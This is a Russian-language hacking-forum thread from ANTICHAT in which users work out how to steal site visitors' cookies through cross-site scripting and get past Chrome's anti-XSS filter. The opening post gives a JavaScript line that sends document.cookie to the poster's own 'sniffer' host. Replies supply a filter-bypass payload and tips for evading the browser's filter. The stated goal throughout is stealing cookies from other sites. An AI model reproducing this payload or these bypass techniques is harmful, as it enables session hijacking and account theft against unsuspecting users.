HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.02.2012, 01:00
albseeras
Новичок
Регистрация: 19.02.2016
Сообщений: 8
С нами: 5385206

Репутация: 0
По умолчанию

Видел одну тему:

HTML highlight

[LEFT][CODE]
Обход Chrome
и так вместо прямой ссылки на снифер http://s.gif делаем в картинке ядовитый код например
img = new Image(); img.src = "http://s.gif?"+document.cookie;
это мы скрываем расширение .js
и открываем на хосте файлом .htaccess нашу картинку и кукисы наши ,таким образом мы обошли фильтр в хроме.
Теперь осталось поменять урл http://www.htmlcodes.me/images/marquees/flying_bat.gif img = new Image(); img.src = "http://мой_сниффер/image.png?"+document.cookie; - т.е перенаправляю на мой сниффер.
Но Chrome не "проглатывает" этот ядовитый код в картинке ,если напрямую указать на сниффер, то приходят ВСЕ кроме cookie...
Что я делаю не так ( В Опере все работает через js) срочно нужна помощь ...какой код надо вписать в картинку? и .htaccess?
 
Ответить с цитированием

  #2  
Старый 23.02.2012, 01:00
albseeras
Новичок
Регистрация: 19.02.2016
Сообщений: 8
С нами: 5385206

Репутация: 0
По умолчанию

Может есть вариант справиться с фильтрами Хрома ,описано здесь Bypassing Chrome’s Anti-XSS filter
http://blog.securitee.org/?p=37 но этот баг уже пофиксили )))
 
Ответить с цитированием

  #3  
Старый 23.02.2012, 01:00
Nick Hander
Познавший АНТИЧАТ
Регистрация: 30.03.2010
Сообщений: 1,068
С нами: 8484086

Репутация: 335


По умолчанию

Но Chrome не "проглатывает" этот ядовитый код в картинке ,если напрямую указать на сниффер, то приходят ВСЕ кроме cookie...

Что я делаю не так ( В Опере все работает через js) срочно нужна помощь ...какой код надо вписать в картинку? и .htaccess?

Ты .htaccess прописал на своем хосте, и прописал код в картинку с расширением .png. Ты думаешь, вставляя картинку на чужой хост, ты украдешь куки? Как бы не так. То правило в .htaccess действительно для твоего хостинга, а не для хоста, с которого крадешь куки. Для целевого сайта картинка воспринимается как обычная картинка. Включайте мозги и обходите фильтры - будет все у вас "проглатывать" =)
 
Ответить с цитированием

  #4  
Старый 23.02.2012, 01:00
MOV_EAX
Участник форума
Регистрация: 10.02.2010
Сообщений: 181
С нами: 8553206

Репутация: 5
По умолчанию

Цитата:

Сообщение от albseeras

Может есть вариант справиться с фильтрами Хрома ,описано здесь Bypassing Chrome’s Anti-XSS filter
http://blog.securitee.org/?p=37 но этот баг уже пофиксили )))

смотря где и в каком месте например тут в Parameter Values Value of GET parameter b: существует проверь на Chrome http://securitee-playground.co.cc/fi...;%3C/script%3E

значит код можно выполнить таким вот образом /*//&b=*/alert%281%29;

то есть нужно смотреть в то место где произошла хss атака включай элемент поиска в браузере + мозги

и затачивай под гоогле хроме свой скрипт
 
Ответить с цитированием

  #5  
Старый 23.02.2012, 01:00
TDSS
Познающий
Регистрация: 07.02.2012
Сообщений: 85
С нами: 7506326

Репутация: 2
По умолчанию

Ребята что хром такое позволяет?
 
Ответить с цитированием

  #6  
Старый 27.02.2012, 01:00
albseeras
Новичок
Регистрация: 19.02.2016
Сообщений: 8
С нами: 5385206

Репутация: 0
По умолчанию

Проверил , оказалось проблема не в фильтрах (синтаксических)- так, как в коде HTML-страницы Хрома все ,таки выводиться
alert(document.cookie)"> т.е. фильтры Хрома пропускают -">alert(document.cookie) и скрипт должен срабатывать в браузере,но он не срабатывает (не выводится alert).Вывод типа Хром не запускает javascript-ы с других доменов ,кроме как с основного ,тобишь защита от межсайтового скриптинга . У кого-нибудь есть мыслишки по этому поводу ???
 
Ответить с цитированием

  #7  
Старый 27.02.2012, 01:00
rox@hak
Постоянный
Регистрация: 04.07.2010
Сообщений: 592
С нами: 8345846

Репутация: 221


По умолчанию

Цитата:

Сообщение от albseeras

Проверил , оказалось проблема не в фильтрах (синтаксических)- так, как в коде HTML-страницы Хрома все ,таки выводиться
alert(document.cookie)"> т.е. фильтры Хрома пропускают -">alert(document.cookie) и скрипт должен срабатывать в браузере,но он не срабатывает (не выводится alert).Вывод типа Хром не запускает javascript-ы с других доменов ,кроме как с основного ,тобишь защита от межсайтового скриптинга . У кого-нибудь есть мыслишки по этому поводу ???

какойто вывод у вас не понятный! какое отношение другой домен имеет к alert(document.cookie), если простой алерт не срабатывает, ищите знаки которые фильтрует сам сайт, и вставляйте их в скрипт, при проходе через фильтр знак отфильтруется , хром увидит несовпадение скрипта в адресной строке и в исходном коде, и пропустит скрипт!
 
Ответить с цитированием

  #8  
Старый 27.02.2012, 01:00
MOV_EAX
Участник форума
Регистрация: 10.02.2010
Сообщений: 181
С нами: 8553206

Репутация: 5
По умолчанию

Цитата:

Сообщение от albseeras

Проверил , оказалось проблема не в фильтрах (синтаксических)- так, как в коде HTML-страницы Хрома все ,таки выводиться
alert(document.cookie)"> т.е. фильтры Хрома пропускают -">alert(document.cookie) и скрипт должен срабатывать в браузере,но он не срабатывает (не выводится alert).Вывод типа Хром не запускает javascript-ы с других доменов ,кроме как с основного ,тобишь защита от межсайтового скриптинга . У кого-нибудь есть мыслишки по этому поводу ???

ты где то рядом
http://www.securitylab.ru/vulnerability/420496.php
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.